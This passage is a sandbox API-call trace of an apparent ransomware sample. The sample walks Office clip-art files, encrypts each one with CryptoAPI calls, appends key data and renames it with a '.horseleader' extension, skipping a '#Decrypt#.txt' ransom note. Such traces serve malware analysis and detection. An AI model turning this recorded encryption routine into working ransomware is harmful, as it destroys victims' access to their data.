lpFileSize=0x32aedd0*=880) returned 1 [0253.395] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x370, lpOverlapped=0x0) returned 1 [0253.398] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc90, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.398] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x370, lpOverlapped=0x0) returned 1 [0253.398] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.398] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.398] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.398] CloseHandle (hObject=0x158) returned 1 [0253.398] GetProcessHeap () returned 0x780000 [0253.398] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.398] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.horseleader") returned 79 [0253.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.horseleader" (normalized: 
"c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf.horseleader")) returned 1 [0253.399] GetProcessHeap () returned 0x780000 [0253.399] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.399] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0f5c00, ftCreationTime.dwHighDateTime=0x1bd4b24, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4d0f5c00, ftLastWriteTime.dwHighDateTime=0x1bd4b24, nFileSizeHigh=0x0, nFileSizeLow=0x27a2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00122_.WMF", cAlternateFileName="")) returned 1 [0253.399] lstrcmpiW (lpString1="BL00122_.WMF", lpString2="Windows") returned -1 [0253.399] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 67 [0253.399] StrStrIW (lpFirst="BL00122_.WMF", lpSrch=".horseleader") returned 0x0 [0253.399] lstrcmpW (lpString1="BL00122_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.399] lstrcmpW (lpString1="BL00122_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.399] lstrlenW (lpString=".testttjffg") returned 11 [0253.399] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.400] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.400] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.400] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 67 [0253.400] StrStrW (lpFirst="BL00122_.WMF", lpSrch=".txt") returned 0x0 [0253.400] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10146) returned 1 [0253.400] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x27a2, lpOverlapped=0x0) returned 1 [0253.403] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd85e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.403] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x27a2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x27a2, lpOverlapped=0x0) returned 1 [0253.403] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.403] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.403] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.403] CloseHandle (hObject=0x158) returned 1 [0253.403] GetProcessHeap () returned 0x780000 [0253.403] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.404] wnsprintfW (in: pszDest=0x7dc820, 
cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.horseleader") returned 79 [0253.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf.horseleader")) returned 1 [0253.405] GetProcessHeap () returned 0x780000 [0253.405] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.405] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39fc8c00, ftCreationTime.dwHighDateTime=0x1bd4b24, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x39fc8c00, ftLastWriteTime.dwHighDateTime=0x1bd4b24, nFileSizeHigh=0x0, nFileSizeLow=0x5b8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00130_.WMF", cAlternateFileName="")) returned 1 [0253.405] lstrcmpiW (lpString1="BL00130_.WMF", lpString2="Windows") returned -1 [0253.405] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 67 [0253.405] StrStrIW (lpFirst="BL00130_.WMF", lpSrch=".horseleader") returned 0x0 [0253.405] lstrcmpW (lpString1="BL00130_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.405] lstrcmpW (lpString1="BL00130_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.405] lstrlenW (lpString=".testttjffg") returned 11 [0253.405] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.405] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.405] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.406] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 67 [0253.406] StrStrW (lpFirst="BL00130_.WMF", lpSrch=".txt") returned 0x0 [0253.406] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1464) returned 1 [0253.406] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5b8, lpOverlapped=0x0) returned 1 [0253.408] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa48, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.408] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5b8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5b8, lpOverlapped=0x0) returned 1 [0253.408] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.408] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.408] WriteFile (in: 
hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.408] CloseHandle (hObject=0x158) returned 1 [0253.408] GetProcessHeap () returned 0x780000 [0253.408] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.408] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.horseleader") returned 79 [0253.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf.horseleader")) returned 1 [0253.409] GetProcessHeap () returned 0x780000 [0253.409] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.409] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c58200, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x83c58200, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x6a0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00148_.WMF", cAlternateFileName="")) returned 1 [0253.409] lstrcmpiW (lpString1="BL00148_.WMF", lpString2="Windows") returned -1 [0253.409] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 67 [0253.409] StrStrIW (lpFirst="BL00148_.WMF", 
lpSrch=".horseleader") returned 0x0 [0253.409] lstrcmpW (lpString1="BL00148_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.409] lstrcmpW (lpString1="BL00148_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.409] lstrlenW (lpString=".testttjffg") returned 11 [0253.409] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.409] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.410] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.410] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.410] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 67 [0253.410] StrStrW (lpFirst="BL00148_.WMF", lpSrch=".txt") returned 0x0 [0253.410] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1696) returned 1 [0253.410] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x6a0, lpOverlapped=0x0) returned 1 [0253.412] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff960, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.412] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x6a0, 
lpOverlapped=0x0) returned 1 [0253.412] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.412] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.413] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.413] CloseHandle (hObject=0x158) returned 1 [0253.413] GetProcessHeap () returned 0x780000 [0253.413] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.413] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.horseleader") returned 79 [0253.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00148_.wmf.horseleader")) returned 1 [0253.414] GetProcessHeap () returned 0x780000 [0253.414] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.414] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82945500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x519c9550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x82945500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, 
nFileSizeLow=0x5ec, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00152_.WMF", cAlternateFileName="")) returned 1 [0253.414] lstrcmpiW (lpString1="BL00152_.WMF", lpString2="Windows") returned -1 [0253.414] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 67 [0253.414] StrStrIW (lpFirst="BL00152_.WMF", lpSrch=".horseleader") returned 0x0 [0253.414] lstrcmpW (lpString1="BL00152_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.414] lstrcmpW (lpString1="BL00152_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.414] lstrlenW (lpString=".testttjffg") returned 11 [0253.414] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.415] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 67 [0253.415] StrStrW (lpFirst="BL00152_.WMF", lpSrch=".txt") returned 0x0 [0253.415] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1516) returned 1 [0253.415] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0x5ec, lpOverlapped=0x0) returned 1 [0253.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.417] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5ec, lpOverlapped=0x0) returned 1 [0253.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.417] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.417] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.417] CloseHandle (hObject=0x158) returned 1 [0253.417] GetProcessHeap () returned 0x780000 [0253.417] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.417] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.horseleader") returned 79 [0253.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf.horseleader")) returned 1 [0253.418] GetProcessHeap () returned 0x780000 [0253.418] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.418] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a72500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5f6dd090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95a72500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0xf92, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00194_.WMF", cAlternateFileName="")) returned 1 [0253.418] lstrcmpiW (lpString1="BL00194_.WMF", lpString2="Windows") returned -1 [0253.418] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 67 [0253.419] StrStrIW (lpFirst="BL00194_.WMF", lpSrch=".horseleader") returned 0x0 [0253.419] lstrcmpW (lpString1="BL00194_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.419] lstrcmpW (lpString1="BL00194_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.419] lstrlenW (lpString=".testttjffg") returned 11 [0253.419] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.419] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.419] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.419] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 67 [0253.419] StrStrW (lpFirst="BL00194_.WMF", lpSrch=".txt") returned 0x0 [0253.419] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3986) returned 1 [0253.419] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf92, lpOverlapped=0x0) returned 1 [0253.421] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff06e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.421] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf92, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf92, lpOverlapped=0x0) returned 1 [0253.421] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.421] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.422] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.422] CloseHandle (hObject=0x158) returned 1 [0253.422] GetProcessHeap () returned 0x780000 [0253.422] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.422] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00194_.WMF.horseleader") returned 79 [0253.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
